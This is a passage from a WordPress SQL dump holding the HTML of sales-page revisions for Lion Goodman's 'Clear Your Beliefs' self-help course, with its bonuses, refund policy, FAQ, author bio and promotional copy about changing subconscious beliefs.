your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-24 16:00:45', '2014-06-24 21:00:45', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1059, 4194, '2014-06-24 15:59:42', '2014-06-24 20:59:42', '<div style="width: 125%; margin-left: -80px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1></h1>\r\n<h1></h1>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" 